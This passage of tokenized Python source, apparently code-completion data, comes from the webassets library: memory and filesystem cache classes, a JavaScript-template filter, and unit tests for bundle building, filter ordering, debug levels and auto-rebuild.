<EOL> yield i <EOL> elif obj is None : <EOL> yield "<STR_LIT:None>" . encode ( '<STR_LIT:utf-8>' ) <EOL> elif isinstance ( obj , types . FunctionType ) : <EOL> yield str ( hash ( obj ) ) . encode ( '<STR_LIT:utf-8>' ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % type ( obj ) ) <EOL> md5 = md5_constructor ( ) <EOL> for d in walk ( data ) : <EOL> md5 . update ( d ) <EOL> return md5 . hexdigest ( ) <EOL> def safe_unpickle ( string ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return pickle . 
loads ( string ) <EOL> except : <EOL> return None <EOL> class BaseCache ( object ) : <EOL> """<STR_LIT>""" <EOL> def get ( self , key ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def set ( self , key , value ) : <EOL> raise NotImplementedError ( ) <EOL> class MemoryCache ( BaseCache ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , capacity ) : <EOL> self . capacity = capacity <EOL> self . keys = [ ] <EOL> self . cache = { } <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return False == other or None == other or id ( self ) == id ( other ) <EOL> def get ( self , key ) : <EOL> key = make_md5 ( make_hashable ( key ) ) <EOL> return self . cache . get ( key , None ) <EOL> def set ( self , key , value ) : <EOL> key = make_md5 ( make_hashable ( key ) ) <EOL> self . cache [ key ] = value <EOL> try : <EOL> self . keys . remove ( key ) <EOL> except ValueError : <EOL> pass <EOL> self . keys . append ( key ) <EOL> to_delete = self . keys [ <NUM_LIT:0> : max ( <NUM_LIT:0> , len ( self . keys ) - self . capacity ) ] <EOL> self . keys = self . keys [ len ( to_delete ) : ] <EOL> for item in to_delete : <EOL> del self . cache [ item ] <EOL> class FilesystemCache ( BaseCache ) : <EOL> """<STR_LIT>""" <EOL> V = <NUM_LIT:2> <EOL> def __init__ ( self , directory , new_file_mode = None ) : <EOL> self . directory = directory <EOL> self . new_file_mode = new_file_mode <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return True == other or self . directory == other or id ( self ) == id ( other ) <EOL> def get ( self , key ) : <EOL> filename = path . join ( self . directory , '<STR_LIT:%s>' % make_md5 ( self . V , key ) ) <EOL> try : <EOL> f = open ( filename , '<STR_LIT:rb>' ) <EOL> except IOError as e : <EOL> if e . errno != errno . ENOENT : <EOL> raise <EOL> return None <EOL> try : <EOL> result = f . read ( ) <EOL> finally : <EOL> f . 
close ( ) <EOL> unpickled = safe_unpickle ( result ) <EOL> if unpickled is None : <EOL> warnings . warn ( '<STR_LIT>' % filename ) <EOL> return unpickled <EOL> def set ( self , key , data ) : <EOL> md5 = '<STR_LIT:%s>' % make_md5 ( self . V , key ) <EOL> filename = path . join ( self . directory , md5 ) <EOL> fd , temp_filename = tempfile . mkstemp ( prefix = '<STR_LIT:.>' + md5 , <EOL> dir = self . directory ) <EOL> try : <EOL> with os . fdopen ( fd , '<STR_LIT:wb>' ) as f : <EOL> pickle . dump ( data , f ) <EOL> f . flush ( ) <EOL> if self . new_file_mode is not None : <EOL> os . chmod ( temp_filename , self . new_file_mode ) <EOL> if os . path . isfile ( filename ) : <EOL> os . unlink ( filename ) <EOL> os . rename ( temp_filename , filename ) <EOL> except : <EOL> os . unlink ( temp_filename ) <EOL> raise <EOL> def get_cache ( option , ctx ) : <EOL> """<STR_LIT>""" <EOL> if not option : <EOL> return None <EOL> if isinstance ( option , BaseCache ) : <EOL> return option <EOL> elif isinstance ( option , type ) and issubclass ( option , BaseCache ) : <EOL> return option ( ) <EOL> if option is True : <EOL> directory = path . join ( ctx . directory , '<STR_LIT>' ) <EOL> if not path . exists ( directory ) : <EOL> os . makedirs ( directory ) <EOL> else : <EOL> directory = option <EOL> return FilesystemCache ( directory , ctx . cache_file_mode ) </s>
<s> import os <EOL> import re <EOL> try : <EOL> import json <EOL> except ImportError : <EOL> import simplejson as json <EOL> from webassets . filter import Filter <EOL> from webassets . utils import common_path_prefix <EOL> __all__ = ( '<STR_LIT>' , ) <EOL> class JSTemplateFilter ( Filter ) : <EOL> """<STR_LIT>""" <EOL> def concat ( self , out , hunks , ** kwargs ) : <EOL> self . process_templates ( out , hunks , ** kwargs ) <EOL> def process_templates ( self , out , hunks , ** kw ) : <EOL> raise NotImplementedError ( ) <EOL> def iter_templates_with_base ( self , hunks ) : <EOL> """<STR_LIT>""" <EOL> base_path = self . _find_base_path ( <EOL> [ info [ '<STR_LIT>' ] for _ , info in hunks ] ) + os . path . sep <EOL> for hunk , info in hunks : <EOL> name = info [ '<STR_LIT>' ] <EOL> name = name [ len ( base_path ) : ] <EOL> name = os . path . splitext ( name ) [ <NUM_LIT:0> ] <EOL> yield name , hunk <EOL> def _find_base_path ( self , paths ) : <EOL> """<STR_LIT>""" <EOL> if len ( paths ) == <NUM_LIT:1> : <EOL> return os . path . dirname ( paths [ <NUM_LIT:0> ] ) <EOL> return common_path_prefix ( paths ) <EOL> class JST ( JSTemplateFilter ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> options = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> max_debug_level = None <EOL> def setup ( self ) : <EOL> super ( JST , self ) . setup ( ) <EOL> self . include_jst_script = ( self . template_function == '<STR_LIT>' ) or self . template_function is None <EOL> def process_templates ( self , out , hunks , ** kwargs ) : <EOL> namespace = self . namespace or '<STR_LIT>' <EOL> if self . bare is False : <EOL> out . write ( "<STR_LIT>" ) <EOL> out . write ( "<STR_LIT>" % ( namespace , namespace ) ) <EOL> if self . include_jst_script : <EOL> out . write ( "<STR_LIT>" % _jst_script ) <EOL> for name , hunk in self . iter_templates_with_base ( hunks ) : <EOL> contents = json . 
dumps ( hunk . data ( ) ) <EOL> out . write ( "<STR_LIT>" % ( namespace , self . _get_jst_name ( name ) ) ) <EOL> if self . template_function is False : <EOL> out . write ( "<STR_LIT>" % ( contents ) ) <EOL> else : <EOL> out . write ( "<STR_LIT>" % ( <EOL> self . template_function or '<STR_LIT>' , contents ) ) <EOL> if self . bare is False : <EOL> out . write ( "<STR_LIT>" ) <EOL> def _get_jst_name ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return _path_separator_re . sub ( self . separator or "<STR_LIT:/>" , name ) <EOL> _path_separator_re = re . compile ( r'<STR_LIT>' ) <EOL> _jst_script = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from nose . tools import assert_raises <EOL> import pytest <EOL> from webassets import Bundle <EOL> from webassets . cache import MemoryCache <EOL> from webassets . exceptions import BuildError , BundleError <EOL> from webassets . filter import Filter <EOL> from webassets . test import TempEnvironmentHelper <EOL> from webassets . updater import BaseUpdater , SKIP_CACHE , TimestampUpdater <EOL> from tests . helpers import noop <EOL> class TestBuildVarious ( TempEnvironmentHelper ) : <EOL> """<STR_LIT>""" <EOL> def test_simple_bundle ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' , output = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_nested_bundle ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mkbundle ( '<STR_LIT>' , self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' , output = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_container_bundle ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mkbundle ( <EOL> self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) , <EOL> self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT:A>' <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT:B>' <EOL> def test_build_return_value ( self ) : <EOL> """<STR_LIT>""" <EOL> hunks = self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' , output = '<STR_LIT>' ) . build ( ) <EOL> assert len ( hunks ) == <NUM_LIT:1> <EOL> assert hunks [ <NUM_LIT:0> ] . data ( ) == '<STR_LIT>' <EOL> hunks = self . mkbundle ( <EOL> self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) , <EOL> self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) ) . build ( ) <EOL> assert len ( hunks ) == <NUM_LIT:2> <EOL> assert hunks [ <NUM_LIT:0> ] . data ( ) == '<STR_LIT:A>' <EOL> assert hunks [ <NUM_LIT:1> ] . 
data ( ) == '<STR_LIT:B>' <EOL> def test_nested_bundle_with_skipped_cache ( self ) : <EOL> """<STR_LIT>""" <EOL> class SkipCacheUpdater ( BaseUpdater ) : <EOL> def needs_rebuild ( self , * a , ** kw ) : <EOL> return SKIP_CACHE <EOL> self . env . updater = SkipCacheUpdater ( ) <EOL> self . create_files ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . mkbundle ( '<STR_LIT>' , self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' , <EOL> output = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_no_output_error ( self ) : <EOL> """<STR_LIT>""" <EOL> assert_raises ( BuildError , self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' ) . build ) <EOL> def test_empty_bundles ( self ) : <EOL> """<STR_LIT>""" <EOL> assert_raises ( BuildError , self . mkbundle ( output = '<STR_LIT>' ) . build ) <EOL> assert_raises ( BuildError , self . mkbundle ( self . mkbundle ( ) , output = '<STR_LIT>' ) . build ) <EOL> self . mkbundle ( self . mkbundle ( ) , '<STR_LIT>' , output = '<STR_LIT>' ) . build ( ) <EOL> def test_rebuild ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' , output = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' , output = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_deleted_source_files ( self ) : <EOL> """<STR_LIT>""" <EOL> self . create_files ( { '<STR_LIT>' : '<STR_LIT:A>' , '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT:2>' } ) <EOL> bundle = self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' , output = '<STR_LIT>' ) <EOL> bundle . build ( ) <EOL> self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> os . unlink ( self . path ( '<STR_LIT>' ) ) <EOL> bundle . build ( ) <EOL> self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> os . unlink ( self . path ( '<STR_LIT>' ) ) <EOL> assert_raises ( BundleError , bundle . 
build ) <EOL> def test_merge_does_not_apply_filters ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . debug = '<STR_LIT>' <EOL> b = self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' , output = '<STR_LIT>' , <EOL> filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> b . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> self . env . debug = False <EOL> b . build ( force = True ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_auto_create_target_directory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' , output = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_with_custom_output ( self ) : <EOL> """<STR_LIT>""" <EOL> from webassets . six import StringIO <EOL> buffer = StringIO ( ) <EOL> self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' , output = '<STR_LIT>' ) . build ( output = buffer ) <EOL> assert buffer . getvalue ( ) == '<STR_LIT>' <EOL> assert not self . exists ( '<STR_LIT>' ) <EOL> class TestBuildWithVariousDebugOptions ( TempEnvironmentHelper ) : <EOL> """<STR_LIT>""" <EOL> def test_debug_mode_inherited ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . debug = True <EOL> b = self . mkbundle ( <EOL> '<STR_LIT>' , <EOL> self . mkbundle ( <EOL> '<STR_LIT>' , filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> output = '<STR_LIT>' , debug = '<STR_LIT>' , <EOL> filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> b . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_cannot_increase_debug_level ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . debug = True <EOL> self . env . updater = False <EOL> self . mkbundle ( '<STR_LIT>' , self . mkbundle ( '<STR_LIT>' , debug = True ) , <EOL> output = '<STR_LIT>' , debug = False ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> self . mkbundle ( <EOL> '<STR_LIT>' , self . 
mkbundle ( '<STR_LIT>' , debug = True ) , <EOL> output = '<STR_LIT>' , debug = '<STR_LIT>' , filters = AppendFilter ( '<STR_LIT:_>' ) ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> self . mkbundle ( <EOL> '<STR_LIT>' , self . mkbundle ( '<STR_LIT>' , debug = '<STR_LIT>' , <EOL> filters = AppendFilter ( '<STR_LIT:_>' ) ) , <EOL> output = '<STR_LIT>' , debug = False ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_decreasing_debug_level ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . debug = '<STR_LIT>' <EOL> b = self . mkbundle ( <EOL> '<STR_LIT>' , <EOL> self . mkbundle ( '<STR_LIT>' , debug = False , <EOL> filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> output = '<STR_LIT>' , debug = '<STR_LIT>' , <EOL> filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> b . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_invalid_debug_value ( self ) : <EOL> """<STR_LIT>""" <EOL> b = self . mkbundle ( '<STR_LIT:a>' , '<STR_LIT:b>' , output = '<STR_LIT>' , debug = "<STR_LIT>" ) <EOL> assert_raises ( BundleError , b . build ) <EOL> self . env . debug = "<STR_LIT>" <EOL> b = self . mkbundle ( '<STR_LIT:a>' , '<STR_LIT:b>' , output = '<STR_LIT>' ) <EOL> assert_raises ( BundleError , b . build ) <EOL> def test_building_in_debug_mode ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . debug = True <EOL> b = self . mkbundle ( <EOL> '<STR_LIT>' , '<STR_LIT>' , output = '<STR_LIT>' , filters = AppendFilter ( '<STR_LIT:foo>' ) ) <EOL> b . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> class ReplaceFilter ( Filter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , input = ( None , None ) , output = ( None , None ) ) : <EOL> Filter . __init__ ( self ) <EOL> self . _input_from , self . _input_to = input <EOL> self . _output_from , self . _output_to = output <EOL> def input ( self , in_ , out , ** kw ) : <EOL> if self . _input_from : <EOL> out . 
write ( in_ . read ( ) . replace ( self . _input_from , self . _input_to ) ) <EOL> else : <EOL> out . write ( in_ . read ( ) ) <EOL> def output ( self , in_ , out , ** kw ) : <EOL> if self . _output_from : <EOL> out . write ( in_ . read ( ) . replace ( self . _output_from , self . _output_to ) ) <EOL> else : <EOL> out . write ( in_ . read ( ) ) <EOL> def unique ( self ) : <EOL> return self . _input_from , self . _output_from <EOL> class AppendFilter ( Filter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , input = None , output = None , unique = True ) : <EOL> Filter . __init__ ( self ) <EOL> self . _input = input <EOL> self . _output = output <EOL> self . _unique = unique <EOL> def input ( self , in_ , out , ** kw ) : <EOL> out . write ( in_ . read ( ) ) <EOL> if self . _input : <EOL> out . write ( self . _input ) <EOL> def output ( self , in_ , out , ** kw ) : <EOL> out . write ( in_ . read ( ) ) <EOL> if self . _output : <EOL> out . write ( self . _output ) <EOL> def unique ( self ) : <EOL> if not self . _unique : <EOL> return False <EOL> return self . _input , self . _output <EOL> class TestFilterApplication ( TempEnvironmentHelper ) : <EOL> """<STR_LIT>""" <EOL> default_files = { '<STR_LIT:1>' : '<STR_LIT:foo>' , '<STR_LIT:2>' : '<STR_LIT:foo>' , '<STR_LIT:3>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT:a>' : '<STR_LIT:bar>' , '<STR_LIT:b>' : '<STR_LIT>' } <EOL> def test_input_before_output ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mkbundle ( '<STR_LIT:1>' , '<STR_LIT:2>' , output = '<STR_LIT>' , filters = ReplaceFilter ( <EOL> input = ( '<STR_LIT:foo>' , '<STR_LIT>' ) , output = ( '<STR_LIT:foo>' , '<STR_LIT>' ) ) ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_output_after_input ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mkbundle ( '<STR_LIT:1>' , '<STR_LIT:2>' , output = '<STR_LIT>' , filters = ReplaceFilter ( <EOL> input = ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , output = ( '<STR_LIT:bar>' , '<STR_LIT>' ) ) ) . 
build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_input_before_output_nested ( self ) : <EOL> """<STR_LIT>""" <EOL> child_bundle_with_output_filter = self . mkbundle ( '<STR_LIT:1>' , '<STR_LIT:2>' , <EOL> filters = ReplaceFilter ( output = ( '<STR_LIT:foo>' , '<STR_LIT>' ) ) ) <EOL> parent_bundle_with_input_filter = self . mkbundle ( child_bundle_with_output_filter , <EOL> output = '<STR_LIT>' , <EOL> filters = ReplaceFilter ( input = ( '<STR_LIT:foo>' , '<STR_LIT>' ) ) ) <EOL> parent_bundle_with_input_filter . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_input_before_output_nested_unique ( self ) : <EOL> """<STR_LIT>""" <EOL> child_bundle = self . mkbundle ( '<STR_LIT:1>' , '<STR_LIT:2>' , <EOL> filters = AppendFilter ( input = '<STR_LIT>' , unique = False ) ) <EOL> parent_bundle = self . mkbundle ( child_bundle , output = '<STR_LIT>' , <EOL> filters = AppendFilter ( input = '<STR_LIT>' , unique = False ) ) <EOL> parent_bundle . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_input_with_nested_in_merge_mode ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . debug = True <EOL> b = self . mkbundle ( <EOL> '<STR_LIT:a>' , <EOL> self . mkbundle ( '<STR_LIT:b>' , <EOL> filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> output = '<STR_LIT>' , filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> debug = '<STR_LIT>' ) <EOL> b . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_input_with_nested_switch_from_merge_to_full_mode ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . debug = '<STR_LIT>' <EOL> child_filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> parent_filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> b = self . mkbundle ( <EOL> '<STR_LIT:a>' , self . 
mkbundle ( '<STR_LIT:b>' , filters = child_filters , debug = False ) , <EOL> output = '<STR_LIT>' , filters = parent_filters , debug = '<STR_LIT>' ) <EOL> b . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_open_before_input ( self ) : <EOL> """<STR_LIT>""" <EOL> captured_kw = { } <EOL> class TestFilter ( Filter ) : <EOL> def open ( self , out , * a , ** kw ) : out . write ( '<STR_LIT:foo>' ) <EOL> def input ( self , * a , ** kw ) : <EOL> assert not captured_kw <EOL> captured_kw . update ( kw ) <EOL> self . create_files ( { '<STR_LIT:a>' : '<STR_LIT:1>' } ) <EOL> self . mkbundle ( '<STR_LIT:a>' , filters = TestFilter , output = '<STR_LIT>' ) . build ( ) <EOL> assert '<STR_LIT>' in captured_kw <EOL> def test_duplicate_open_filters ( self ) : <EOL> """<STR_LIT>""" <EOL> class OpenFilter ( Filter ) : <EOL> def open ( self , * a , ** kw ) : pass <EOL> def __init__ ( self , id ) : Filter . __init__ ( self ) ; self . id = id <EOL> def id ( self ) : return self . id <EOL> self . create_files ( set ( '<STR_LIT>' ) ) <EOL> bundle = self . mkbundle ( <EOL> '<STR_LIT>' , filters = ( OpenFilter ( '<STR_LIT:a>' ) , OpenFilter ( '<STR_LIT:b>' ) ) ) <EOL> assert_raises ( BuildError , bundle . build ) <EOL> def test_concat ( self ) : <EOL> """<STR_LIT>""" <EOL> class ConcatFilter ( Filter ) : <EOL> def concat ( self , out , hunks , ** kw ) : <EOL> out . write ( '<STR_LIT>' . join ( [ h . data ( ) for h , info in hunks ] ) ) <EOL> self . create_files ( { '<STR_LIT:a>' : '<STR_LIT:1>' , '<STR_LIT:b>' : '<STR_LIT:2>' } ) <EOL> self . mkbundle ( '<STR_LIT:a>' , '<STR_LIT:b>' , filters = ConcatFilter , output = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_container_bundle_with_filters ( self ) : <EOL> """<STR_LIT>""" <EOL> self . 
mkbundle ( <EOL> Bundle ( '<STR_LIT:1>' , output = '<STR_LIT>' , filters = ( ) ) , <EOL> Bundle ( '<STR_LIT:2>' , output = '<STR_LIT>' , filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> Bundle ( '<STR_LIT:3>' , output = '<STR_LIT>' , filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' , unique = False ) ) , <EOL> filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' , unique = False ) <EOL> ) . urls ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> class TestMaxDebugLevelFilters ( TempEnvironmentHelper ) : <EOL> """<STR_LIT>""" <EOL> default_files = { '<STR_LIT:1>' : '<STR_LIT:foo>' } <EOL> @ pytest . mark . parametrize ( "<STR_LIT>" , [ '<STR_LIT>' , True , None ] ) <EOL> def test_with_level ( self , level ) : <EOL> self . env . debug = True <EOL> f = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) ; f . max_debug_level = level <EOL> self . mkbundle ( '<STR_LIT:1>' , output = '<STR_LIT>' , filters = f , debug = level ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_upgrading_affect_on_normal_filters ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . debug = True <EOL> f = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> f . max_debug_level = None <EOL> g = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . mkbundle ( Bundle ( '<STR_LIT:1>' , filters = ( f , g ) , debug = True ) , <EOL> output = '<STR_LIT>' , debug = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> class TestAutoBuild ( TempEnvironmentHelper ) : <EOL> """<STR_LIT>""" <EOL> def setup ( self ) : <EOL> TempEnvironmentHelper . setup ( self ) <EOL> class CustomUpdater ( BaseUpdater ) : <EOL> allow = True <EOL> def needs_rebuild ( self , * a , ** kw ) : <EOL> return self . allow <EOL> self . env . updater = self . 
updater = CustomUpdater ( ) <EOL> def test_autocreate ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . auto_build = True <EOL> self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) . urls ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT:A>' <EOL> def test_autocreate_with_autobuild_disabled ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . auto_build = False <EOL> self . env . url_expire = False <EOL> bundle = self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) <EOL> bundle . urls ( ) <EOL> assert not self . exists ( '<STR_LIT>' ) <EOL> bundle . build ( force = False ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT:A>' <EOL> def test_no_updater ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . updater = False <EOL> self . create_files ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) . build ( force = False ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT:A>' <EOL> def test_updater_says_no ( self ) : <EOL> """<STR_LIT>""" <EOL> self . create_files ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . updater . allow = False <EOL> self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) . build ( force = True ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT:A>' <EOL> def test_updater_says_yes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . create_files ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . updater . allow = True <EOL> self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT:A>' <EOL> def test_updater_says_skip_cache ( self ) : <EOL> """<STR_LIT>""" <EOL> class TestMemoryCache ( MemoryCache ) : <EOL> getc = <NUM_LIT:0> <EOL> def get ( self , key ) : <EOL> self . getc += <NUM_LIT:1> <EOL> return MemoryCache . get ( self , key ) <EOL> self . env . cache = TestMemoryCache ( <NUM_LIT:100> ) <EOL> self . 
create_files ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . updater . allow = SKIP_CACHE <EOL> b = self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' , filters = noop ) <EOL> b . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT:A>' <EOL> assert self . env . cache . getc == <NUM_LIT:0> <EOL> self . updater . allow = True <EOL> b . build ( ) <EOL> assert self . env . cache . getc > <NUM_LIT:0> <EOL> def test_dependency_refresh ( self ) : <EOL> """<STR_LIT>""" <EOL> updater = self . env . updater = TimestampUpdater ( ) <EOL> self . env . cache = False <EOL> self . create_files ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> b = self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' , depends = '<STR_LIT>' ) <EOL> b . build ( ) <EOL> now = self . setmtime ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert updater . needs_rebuild ( b , self . env ) == False <EOL> self . create_files ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . setmtime ( '<STR_LIT>' , mtime = now + <NUM_LIT:100> ) <EOL> assert updater . needs_rebuild ( b , self . env ) == False <EOL> self . setmtime ( '<STR_LIT>' , mtime = now + <NUM_LIT:200> ) <EOL> assert updater . needs_rebuild ( b , self . env ) == SKIP_CACHE <EOL> b . build ( ) <EOL> self . setmtime ( '<STR_LIT>' , mtime = now + <NUM_LIT:200> ) <EOL> self . setmtime ( '<STR_LIT>' , mtime = now + <NUM_LIT> ) <EOL> assert updater . needs_rebuild ( b , self . env ) == SKIP_CACHE <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ False , True ] ) <EOL> def dependency_refresh_with_cache ( self , rebuild_with_force ) : <EOL> """<STR_LIT>""" <EOL> DEPENDENCY = '<STR_LIT>' <EOL> DEPENDENCY_SUB = '<STR_LIT>' <EOL> self . env . updater = TimestampUpdater ( ) <EOL> self . env . cache = MemoryCache ( <NUM_LIT:100> ) <EOL> self . create_files ( { <EOL> DEPENDENCY : '<STR_LIT>' , <EOL> DEPENDENCY_SUB : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> bundle = self . 
mkbundle ( <EOL> '<STR_LIT>' , <EOL> output = '<STR_LIT>' , <EOL> depends = ( DEPENDENCY , ) , <EOL> filters = lambda in_ , out : out . write ( in_ . read ( ) + self . get ( DEPENDENCY ) ) ) <EOL> bundle . contents += ( self . mkbundle ( <EOL> '<STR_LIT>' , <EOL> filters = lambda in_ , out : out . write ( self . get ( DEPENDENCY_SUB ) ) ) , ) <EOL> bundle . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert self . env . cache . keys <EOL> self . create_files ( { DEPENDENCY : '<STR_LIT>' } ) <EOL> self . create_files ( { DEPENDENCY_SUB : '<STR_LIT>' } ) <EOL> now = self . setmtime ( '<STR_LIT>' ) <EOL> self . setmtime ( '<STR_LIT>' , '<STR_LIT>' , mtime = now - <NUM_LIT:100> ) <EOL> self . setmtime ( DEPENDENCY , DEPENDENCY_SUB , mtime = now + <NUM_LIT:100> ) <EOL> bundle . build ( force = rebuild_with_force ) <EOL> if 